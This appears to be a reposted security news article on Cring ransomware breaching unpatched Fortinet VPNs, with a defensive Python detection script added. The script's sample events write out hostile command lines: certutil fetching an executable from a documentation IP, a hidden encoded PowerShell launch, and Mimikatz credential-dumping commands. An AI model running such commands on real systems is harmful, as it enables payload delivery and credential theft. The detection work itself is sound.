Privacy Ninja

New Cring Ransomware Hits Unpatched Fortinet VPN Devices

A vulnerability impacting Fortinet VPNs is being exploited by a new human-operated ransomware strain known as Cring to breach and encrypt industrial sector companies’ networks.

Cring ransomware (also known as Crypt3r, Vjiszy1lo, Ghost, Phantom) was discovered by Amigo_A in January and spotted by the CSIRT team of Swiss telecommunications provider Swisscom.

After gaining initial access, the Cring operators drop customized Mimikatz samples followed by Cobalt Strike, and then deploy the ransomware payloads, downloading them with the legitimate Windows CertUtil certificate manager to evade security software.

As Kaspersky researchers revealed in a report published today, the attackers exploit Internet-exposed Fortigate SSL VPN servers unpatched against the CVE-2018-13379 vulnerability, which allows them to breach their targets’ network.

“Victims of these attacks include industrial enterprises in European countries,” Kaspersky researchers said.

“At least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted.”

Cring ransomware attacks

From the Fortinet VPN appliance, Cring operators move laterally across the target’s enterprise network, stealing Windows user credentials with Mimikatz to gain control of the domain administrator account.

The ransomware payloads are then delivered to devices on the victims’ networks using the Cobalt Strike threat emulation framework, which is itself deployed by a malicious PowerShell script.

[Figure: Cring ransomware attack flow (Kaspersky)]

The ransomware encrypts only specific files on the compromised devices using strong encryption algorithms (RSA-8192 + AES-128) after removing backup files and killing Microsoft Office and Oracle Database processes.

It then drops ransom notes named !!!!!readme.rtf and deReadMe!!!.txt warning the victims that their network was encrypted and that they need to hurry to pay the ransom because the decryption key will not be kept indefinitely.

Sorry, your network is encrypted, and most files are encrypted using special technology. The file cannot be recovered by any security company. If you do not believe that you can even consult a security company, your answer will be that you need to pay the corresponding fees, but we have a good reputation. After receiving the corresponding fee, we will immediately send the decryption program and KEY. You can contact us to get two file decryption services, and then you will get all decryption services after paying our fee, usually the cost is about 2 bitcoins.

Contact: [email protected]  [email protected]
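The intrusion chain described above (CertUtil abused as a downloader, a PowerShell script launching the Cobalt Strike stage, Mimikatz credential theft, and the two ransom note file names) leaves traces that endpoint telemetry can catch before or during encryption. The following Python script is an added example, not code from the original article or from Kaspersky’s report: it expresses each of those observables as a simple rule and runs the rules over a handful of constructed process-creation and file-creation events. All host names, paths and the 198.51.100.7 address are constructed for the example; the PowerShell and Mimikatz checks are generic heuristics of my own, not signatures taken from the report.

```python
"""Toy detection rules for the observable steps of the Cring chain.

All events below are constructed for this example; nothing here is a real log.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Set


@dataclass
class Event:
    host: str
    kind: str          # "process" (process creation) or "file" (file creation)
    image: str = ""    # process image path (process events)
    cmdline: str = ""  # full command line (process events)
    parent: str = ""   # parent image path (process events)
    path: str = ""     # created file path (file events)


# Ransom note names reported for Cring, lower-cased for matching.
RANSOM_NOTE_NAMES = {"!!!!!readme.rtf", "dereadme!!!.txt"}


def _basename(p: str) -> str:
    """Last path component, lower-cased, accepting both \\ and / separators."""
    return re.split(r"[\\/]", p)[-1].lower()


def rule_certutil_download(e: Event) -> Optional[str]:
    """certutil.exe asked to fetch a URL (-urlcache) instead of doing certificate work."""
    if e.kind != "process" or _basename(e.image) != "certutil.exe":
        return None
    cl = e.cmdline.lower()
    if "-urlcache" in cl or re.search(r"https?://", cl):
        return "download"
    return None


def rule_powershell_suspicious(e: Event) -> Optional[str]:
    """Heuristic (assumption): PowerShell with an encoded command, hidden window or policy bypass."""
    if e.kind != "process" or _basename(e.image) != "powershell.exe":
        return None
    cl = e.cmdline.lower()
    markers = ("-encodedcommand", "-enc ", "-ec ", "-executionpolicy bypass",
               "-w hidden", "-windowstyle hidden", "downloadstring(")
    if any(m in cl for m in markers):
        return "execution"
    return None


def rule_mimikatz_modules(e: Event) -> Optional[str]:
    """Mimikatz module names on the command line survive a renamed or customized binary."""
    if e.kind != "process":
        return None
    cl = e.cmdline.lower()
    if any(m in cl for m in ("sekurlsa::", "lsadump::", "privilege::debug")):
        return "credential_access"
    return None


def rule_ransom_note(e: Event) -> Optional[str]:
    """Creation of one of the Cring ransom note files."""
    if e.kind == "file" and _basename(e.path) in RANSOM_NOTE_NAMES:
        return "impact"
    return None


RULES: List[Callable[[Event], Optional[str]]] = [
    rule_certutil_download, rule_powershell_suspicious,
    rule_mimikatz_modules, rule_ransom_note,
]


def run_rules(events: List[Event]) -> List[Dict[str, str]]:
    """Apply every rule to every event; return one hit per (event, rule) match."""
    hits = []
    for e in events:
        for rule in RULES:
            stage = rule(e)
            if stage:
                hits.append({"host": e.host, "stage": stage, "rule": rule.__name__,
                             "detail": e.cmdline or e.path})
    return hits


def stages_seen(hits: List[Dict[str, str]]) -> Set[str]:
    """Which stages of the chain have been observed across all hits."""
    return {h["stage"] for h in hits}


# Constructed sample telemetry (not real logs). 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    Event("WS01", "process", image=r"C:\Windows\System32\certutil.exe", parent=r"C:\Windows\System32\cmd.exe",
          cmdline=r"certutil.exe -urlcache -split -f http://198.51.100.7/update.exe C:\Users\Public\update.exe"),
    Event("WS01", "process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\System32\cmd.exe",
          cmdline="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    Event("DC01", "process", image=r"C:\Users\Public\m.exe", parent=r"C:\Windows\System32\cmd.exe",
          cmdline="m.exe privilege::debug sekurlsa::logonpasswords exit"),
    Event("FS01", "file", path=r"C:\Shares\Finance\!!!!!readme.rtf"),
    # Benign noise: certutil used for hashing, and an ordinary document.
    Event("WS02", "process", image=r"C:\Windows\System32\certutil.exe", parent=r"C:\Windows\System32\cmd.exe",
          cmdline=r"certutil.exe -hashfile C:\tools\agent.exe SHA256"),
    Event("WS02", "file", path=r"C:\Users\alice\Documents\report.docx"),
]


if __name__ == "__main__":
    for h in run_rules(SAMPLE_EVENTS):
        print(f"{h['host']}: {h['stage']:17} {h['rule']:26} {h['detail']}")
    print("stages observed:", sorted(stages_seen(run_rules(SAMPLE_EVENTS))))
```

Seeing several stages on different hosts within a short window is what turns these individually noisy rules into a useful alert; in practice the rules would be fed from Sysmon or EDR process- and file-creation events rather than the constructed list above.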

Victims have been using the ID-Ransomware service to check if their systems were hit by Cring ransomware since the operation first surfaced in December 2020.

30 Cring ransomware samples have been submitted so far, with at least one per day since the end of January.

[Figure: Cring ransomware activity (ID-Ransomware)]

Indicators of compromise (IOCs), including malware sample hashes, C2 server IP addresses, and malware-hosting server addresses, are available at the end of Kaspersky’s report.

Fortinet products targeted by APT and cybercrime groups

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warned earlier this week of advanced persistent threat (APT) actors scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379 exploits.

The joint advisory also warns of attackers enumerating servers unpatched against CVE-2020-12812 and CVE-2019-5591.

As shown by previous campaigns, any servers compromised during these infiltration attempts might be used in future attacks as initial access vectors to breach government or commercial organizations’ networks.

“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” the agencies warned.

“APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.”

State hackers abused the CVE-2018-13379 vulnerability in the past to compromise U.S. election support systems reachable over the Internet.

Fortinet also warned customers to patch their appliances against CVE-2018-13379 in August 2019, July 2020, November 2020, and again in April 2021.

“The security of our customers is our first priority. CVE-2018-13379 is an old vulnerability resolved in May 2019,” Fortinet told BleepingComputer earlier this week. “If customers have not done so, we urge them to immediately implement the upgrade and mitigations.”
